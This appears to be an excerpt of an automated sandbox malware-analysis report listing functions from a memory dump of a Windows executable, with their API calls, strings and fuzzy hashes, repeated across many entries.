Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: ~`|+
API String ID: 0-3443854377
Opcode ID: 1c40c1a6b42a4025ee39e075511bcd83b0df2ee5cc54f84576872bbc0821b364
Instruction ID: b508d095f4b2bdeda5c38f2eb6e397ac095a12de84cb9be7fbf287cb3019bd26
Opcode Fuzzy Hash: 1c40c1a6b42a4025ee39e075511bcd83b0df2ee5cc54f84576872bbc0821b364
Instruction Fuzzy Hash: 1E31B272900219AFCB24DF69DC89DABB7A9EB84314F15456EF90693244FA34AE408B58

Uniqueness

Uniqueness Score: -1.00%

Function 004691A0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 00460B59: GetLastError.KERNEL32(?,00000000,?,0045A0EC,00000000,00000000,?,?,0045BF6A,00000000,00000000,?,?,?), ref: 00460B5E
Part of subcall function 00460B59: SetLastError.KERNEL32(00000000,00000002,000000FF,?,0045BF6A,00000000,00000000,?,?,?), ref: 00460BFC

Part of subcall function 00460B59: _free.LIBCMT ref: 00460BBB
Part of subcall function 00460B59: _free.LIBCMT ref: 00460BF1

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004691F4

Strings

~`|+, xrefs: 004691AB

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast_free$InfoLocale
String ID: ~`|+
API String ID: 2003897158-3443854377
Opcode ID: ce1db5cd78fe9528796730723824b1e8a2b260209c47f43166a9698e9f7b5f32
Instruction ID: b8024536251168a6a8dd6b5465400fcc36325034e97781501986dfdd9d94052a
Opcode Fuzzy Hash: ce1db5cd78fe9528796730723824b1e8a2b260209c47f43166a9698e9f7b5f32
Instruction Fuzzy Hash: 6A219D72600206ABDF289B26DC52A7B73ACEF45714B1044BBE901D6241FAB8ED45865A

Uniqueness

Uniqueness Score: -1.00%

Function 0046354D, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

Part of subcall function 0045C9D1: EnterCriticalSection.KERNEL32(?,?,0045D62A,00000000,004ED368,0000000C,0045D5F1,00000010,?,004626F5,00000010,?,00460CFB,00000001,00000364,00000002), ref: 0045C9E0

EnumSystemLocalesW.KERNEL32(00463540,00000001,004ED588,0000000C,004638EF,00000000), ref: 00463585

Strings

~`|+, xrefs: 0046358D

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID: ~`|+
API String ID: 1272433827-3443854377
Opcode ID: f081c4a8eb885ce46147bd098848956ee439e171f18ad3de178b3e2cb805be6f
Instruction ID: 6ddfb025e4db2ae3e6c11b42ababf9ae8e8805b98672820430cc4ded004e2301
Opcode Fuzzy Hash: f081c4a8eb885ce46147bd098848956ee439e171f18ad3de178b3e2cb805be6f
Instruction Fuzzy Hash: B5F04FB2A40204EFD700DF99E842B5D7BF0EB44726F10412BF515DB2A1DB795914CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0045B2E0, Relevance: 3.4, APIs: 2, Instructions: 450COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9cf9e444f66de35d4b454e65144b8b689c9d9fd2cb9deb433e22491380cd252
Instruction ID: c0fe044e1c1b1741238f7c961cae1f647881f712e1cd6ea39a3691266540e5d2
Opcode Fuzzy Hash: b9cf9e444f66de35d4b454e65144b8b689c9d9fd2cb9deb433e22491380cd252
Instruction Fuzzy Hash: 0EF16071E002199FDF14CFA8C9806AEFBB1FF88315F25826AD815A7341D7349E05CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00493680, Relevance: 2.8, Strings: 2, Instructions: 281COMMON

Download Yara Rule

Strings

EncodingParameters, xrefs: 00493812
~`|+, xrefs: 00493694

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: EncodingParameters$~`|+
API String ID: 0-67167004
Opcode ID: 4e67c00b63f3f7ec7f2d3252bf96d85270637209a98d7b488983a4a48ff91137
Instruction ID: 0d44f1c65ef9491f2ea83d19d1e2da922659f590c0d4d4d0a4d7971247ea21c7
Opcode Fuzzy Hash: 4e67c00b63f3f7ec7f2d3252bf96d85270637209a98d7b488983a4a48ff91137
Instruction Fuzzy Hash: A4B15C70E00248AFDF14CFA8C884BAEBFF1AF89304F248159E415AB391D775AE45CB55

Uniqueness

Uniqueness Score: -1.00%

Function 0046207C, Relevance: 1.8, APIs: 1, Instructions: 274COMMON

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,00000000,?,00000008,?,?,00462077,00000000,?,00000008,?,?,0046BE62,00000000), ref: 004622A9

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 855b71c5516c90386437d649192d5753159368abaac62fa70d4821bb44deef1d
Instruction ID: 4ce8bff0cabcd0ed778df5d26467d0d6228accebaa26e630825ae05a20de8284
Opcode Fuzzy Hash: 855b71c5516c90386437d649192d5753159368abaac62fa70d4821bb44deef1d
Instruction Fuzzy Hash: 29B1C131210A04EFD718CF28C586BA57BE0FF05364F25865AE999CF3A1D379E982CB05

Uniqueness

Uniqueness Score: -1.00%

Function 0048CFC0, Relevance: 1.8, Strings: 1, Instructions: 510COMMON

Download Yara Rule

Strings

~`|+, xrefs: 0048CFD7

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: ~`|+
API String ID: 0-3443854377
Opcode ID: ba06d8a026613b6c05d5e0210f3d8674ce2166900ba39f5bedd40cba2fc28474
Instruction ID: 3d5b275d5af00ea7ecab10279dd1b098615f244ae7bcf5875c0fde7d4f2b7202
Opcode Fuzzy Hash: ba06d8a026613b6c05d5e0210f3d8674ce2166900ba39f5bedd40cba2fc28474
Instruction Fuzzy Hash: 48222871E012198FCF14DF98C940AADBBB6FF88304F15855EE819AB355DB34AD46CB84

Uniqueness

Uniqueness Score: -1.00%

Function 0048C4C0, Relevance: 1.6, Strings: 1, Instructions: 358COMMON

Download Yara Rule

Strings

~`|+, xrefs: 0048C3F3, 0048C4D7, 0048C6F3, 0048C7C4

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: ~`|+
API String ID: 0-3443854377
Opcode ID: 476dcd0da5192823e08c1a1e861270bb06effa5e1a033153e66299c941ab3d62
Instruction ID: 54bab19e5d72f60bd144054f7ecf1fbbdd1ad6e5a163461a292eba8ab127f02e
Opcode Fuzzy Hash: 476dcd0da5192823e08c1a1e861270bb06effa5e1a033153e66299c941ab3d62
Instruction Fuzzy Hash: B3D14A71E00208AFCB00DFA9C840AAEFBF5FF88314F14456AF915A7351EB35A945CB95

Uniqueness

Uniqueness Score: -1.00%

Function 004685D0, Relevance: 1.6, Strings: 1, Instructions: 327COMMON

Download Yara Rule

Strings

~`|+, xrefs: 004685DB, 004688BB

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastProcess_free$CurrentFeatureInfoLocalePresentProcessorTerminate
String ID: ~`|+
API String ID: 4283097504-3443854377
Opcode ID: b88eaf8448b90650ca82938870cbd28a117eec023751ce52236fb0732f3fd5b9
Instruction ID: ac214ead99f94959e8f976828ef9e7bd06eb08f813d8caab9819973f68507b71
Opcode Fuzzy Hash: b88eaf8448b90650ca82938870cbd28a117eec023751ce52236fb0732f3fd5b9
Instruction Fuzzy Hash: 3DB1F8755007058BDB38AF65CC82AB7B3A8EF54308F54462FE943C6680FE79A985C71A

Uniqueness

Uniqueness Score: -1.00%

Function 00468E12, Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 00460B59: GetLastError.KERNEL32(?,00000000,?,0045A0EC,00000000,00000000,?,?,0045BF6A,00000000,00000000,?,?,?), ref: 00460B5E
Part of subcall function 00460B59: SetLastError.KERNEL32(00000000,00000002,000000FF,?,0045BF6A,00000000,00000000,?,?,?), ref: 00460BFC

EnumSystemLocalesW.KERNEL32(00468F40,00000001,00000000,?,-00000050,?,0046957B,00000000,?,?,?,00000055,?), ref: 00468E84

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 436359a9460a3edc377335af9aa2a042a7e054cb89b6dae9f3a9fdcc10e5532a
Instruction ID: eb970fc5c4e5a017a9727196ff0146c5dc4c3eb40a4c288da316507c69692d87
Opcode Fuzzy Hash: 436359a9460a3edc377335af9aa2a042a7e054cb89b6dae9f3a9fdcc10e5532a
Instruction Fuzzy Hash: 8C1129372003019FDB189F39C89167BB792FF84318B14452EE54687740E775B802C744

Uniqueness

Uniqueness Score: -1.00%

Function 004693CC, Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

Part of subcall function 00460B59: GetLastError.KERNEL32(?,00000000,?,0045A0EC,00000000,00000000,?,?,0045BF6A,00000000,00000000,?,?,?), ref: 00460B5E
Part of subcall function 00460B59: SetLastError.KERNEL32(00000000,00000002,000000FF,?,0045BF6A,00000000,00000000,?,?,?), ref: 00460BFC

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0046915C,00000000,00000000,?), ref: 004693F8

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 49fad1f92caae4e0bf452df3bc21c00bfde7b5bfb25e8d9ffddd78f181c6ced9
Instruction ID: 2a2d284499b39a495f28c6051fd55235802dbf6c80ca143142252f815c18cfce
Opcode Fuzzy Hash: 49fad1f92caae4e0bf452df3bc21c00bfde7b5bfb25e8d9ffddd78f181c6ced9
Instruction Fuzzy Hash: 7FF0F932504112AFDB285A66CC067BB775CEB40754F04442AED05A3280FE78FE02C599

Uniqueness

Uniqueness Score: -1.00%

Function 00468EAD, Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

APIs

Part of subcall function 00460B59: GetLastError.KERNEL32(?,00000000,?,0045A0EC,00000000,00000000,?,?,0045BF6A,00000000,00000000,?,?,?), ref: 00460B5E
Part of subcall function 00460B59: SetLastError.KERNEL32(00000000,00000002,000000FF,?,0045BF6A,00000000,00000000,?,?,?), ref: 00460BFC

EnumSystemLocalesW.KERNEL32(004691A0,00000001,?,?,-00000050,?,0046953F,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00468EF7

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 67520888ec1bc52c9cf196ee7a047ef6488143a9d020591e917d06263cf3576b
Instruction ID: 71327e37c558b4e0cdeb7ad5ef5ba66c990269da2905166c9833af212b3fc1ef
Opcode Fuzzy Hash: 67520888ec1bc52c9cf196ee7a047ef6488143a9d020591e917d06263cf3576b
Instruction Fuzzy Hash: 90F046363003045FDB145F39DC85A7B7B91EFC132CB14452EFA058B680EAB6AC02C618

Uniqueness

Uniqueness Score: -1.00%

Function 00468DC7, Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00460B59: GetLastError.KERNEL32(?,00000000,?,0045A0EC,00000000,00000000,?,?,0045BF6A,00000000,00000000,?,?,?), ref: 00460B5E
Part of subcall function 00460B59: SetLastError.KERNEL32(00000000,00000002,000000FF,?,0045BF6A,00000000,00000000,?,?,?), ref: 00460BFC

EnumSystemLocalesW.KERNEL32(00468D20,00000001,?,?,?,0046959D,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00468DFE

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 18ef7f25f8ebce8dd4172c638484948bb55cfaa7e312cd364f3970417f409685
Instruction ID: 31e64f91b287c9aea94dc4a1ea75a83011c9871f8597995694cc608cc9b177dc
Opcode Fuzzy Hash: 18ef7f25f8ebce8dd4172c638484948bb55cfaa7e312cd364f3970417f409685
Instruction Fuzzy Hash: 8EF0AB3630020557CB049F3ADC5576B7F90EFC1B14B06406EEB09CB280EA39DC42C7A4

Uniqueness

Uniqueness Score: -1.00%

Function 004639F3, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,0045F9B1,?,20001004,00000000,00000002,?,?,0045EF9C), ref: 00463A27

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 48468722bc3f10f54a676b66ed38c30321f60c70489e4fc186bcf463267b774c
Instruction ID: abebbf910bd63fe5215db01c69f69befe19d0409b56d263a384d98483c684984
Opcode Fuzzy Hash: 48468722bc3f10f54a676b66ed38c30321f60c70489e4fc186bcf463267b774c
Instruction Fuzzy Hash: 66E0DF31A0016CBBCF126F61EC04E9E3E15EF04761F008026FD0021222DB358E20AA9E

Uniqueness

Uniqueness Score: -1.00%

Function 00401760, Relevance: 1.5, Strings: 1, Instructions: 266COMMON

Download Yara Rule

Strings

~`|+, xrefs: 0040176C

Memory Dump Source

Source File: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: ~`|+
API String ID: 0-3443854377
Opcode ID: f2555714bfedcc998023025e6c1a68a2350f3a97abe15c20bd4602aeb92e95cb
Instruction ID: bd00ab582065445c89aaad0dc85c8b387f8c24563ea5efb20cdaa7a426e092fc
Opcode Fuzzy Hash: f2555714bfedcc998023025e6c1a68a2350f3a97abe15c20bd4602aeb92e95cb
Instruction Fuzzy Hash: FBB17AB6818B564BD7129F3ED8C2562B751FFE6244B04C72BFDE433A60DB31A501A354

Uniqueness

Uniqueness Score: -1.00%

Function 0044E3F5, Relevance: 1.5, APIs: 1, Instructions: 9nativeCOMMON

Download Yara Rule

APIs

NtFlushProcessWriteBuffers.NTDLL ref: 0044E408

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: BuffersFlushProcessWrite
String ID:
API String ID: 2982998374-0
Opcode ID: 0f6371f634ea42d117bc1975026b8a33a8c0228140976f3727834b2954e2d4ea
Instruction ID: fbd8a0ab03a0d78f9fc1f4cdfac9e471fc821310d82807c77dcf7887cfa88e69
Opcode Fuzzy Hash: 0f6371f634ea42d117bc1975026b8a33a8c0228140976f3727834b2954e2d4ea
Instruction Fuzzy Hash: FFB09232F03430478A156B18BC585AE7754EE40A1130A42B6DA41A7364CA142D929BCD

Uniqueness

Uniqueness Score: -1.00%

Function 0045A7C0, Relevance: 1.5, Strings: 1, Instructions: 216COMMON

Download Yara Rule

Strings

0, xrefs: 0045A93C

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: e680efd39e9fbe366e702e50e018ed3cac2d5034fa1ad63f8a2d9bf410d4b192
Instruction ID: 25c090161ee8cba2e90488038ebfa9b681409046d3d741b1bfcf78c3b7f1c6ab
Opcode Fuzzy Hash: e680efd39e9fbe366e702e50e018ed3cac2d5034fa1ad63f8a2d9bf410d4b192
Instruction Fuzzy Hash: A55149B06006489ADB38A929449A7BF6799AB01306F184B1FDC82D7383D61D9D6FC31F

Uniqueness

Uniqueness Score: -1.00%

Function 0049C051, Relevance: 1.4, Strings: 1, Instructions: 173COMMON

Download Yara Rule

Strings

4, xrefs: 0049C1EB

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: 4
API String ID: 0-4088798008
Opcode ID: 29c8e8eb573f31a7d0b58d2d61eb3e2719cb05c39230b61dcff15701015fd316
Instruction ID: 806ebb8d2aaed115468716c10819dff96b647e85b2a579a24130d1eb96a05b67
Opcode Fuzzy Hash: 29c8e8eb573f31a7d0b58d2d61eb3e2719cb05c39230b61dcff15701015fd316
Instruction Fuzzy Hash: FE61C7B1E00615DBCF18CF99C5C1A6EBBB1BB48314F25856AD805A7706C739E982CF98

Uniqueness

Uniqueness Score: -1.00%

Function 004961AB, Relevance: .7, Instructions: 651COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1075c3d3fdcc26b23483a414f7bd7b21ac0816bdcc2e85d978c75303767dbef4
